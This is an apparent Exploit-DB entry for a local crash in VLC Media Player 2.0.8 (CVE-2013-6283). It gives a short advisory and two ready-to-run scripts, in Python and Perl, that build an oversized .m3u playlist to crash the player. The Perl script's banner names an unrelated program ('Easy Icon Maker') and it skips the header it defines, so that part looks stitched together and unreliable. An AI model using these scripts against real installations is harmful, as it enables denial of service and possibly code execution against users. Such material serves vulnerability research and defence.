VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)
Author: Asesino04
type: dos
platform: windows
port:
date_added: 2013-08-19
date_updated: 2013-08-19
verified: 1
codes: OSVDB-96603;CVE-2013-6283
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comvlc-2.0.8-win32.exe
# Exploit Title: VLC Player 2.0.8 <= Local Crash PoC
# Vendor URI: http://www.videolan.org/vlc/
# Vendor Description:
# VLC is a free and open source cross-platform multimedia player
# and framework that plays most multimedia files as well as DVD,
# Audio CD, VCD, and various streaming protocols.
# Tested on: [ Windows 7]
VLC Player is prone to a remote denial-of-service vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
VLC Player 2.0.8 is vulnerable; other versions may also be affected.
# !/usr/bin/python
header="http://"
poc= "\x41" * 50000
file = open("asesino04.m3u","w")
file.write(header+poc)
file.close()
-------------------
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";
print " |=======================================================|\n";
print " |= [!] Name : Easy Icon Maker Version =|\n";
print " |= [!] Exploit : Crash Exploit =|\n";
print " |= [!] Author : The Black Devils =|\n";
print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";
print " |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $header="http://" ;
my $PoC = "\x41" x 50000 ;
open(file , ">", "inj3ct0rs.m3u");
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS!
File is Not Created !! ";
close(file);
# Contact :
------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com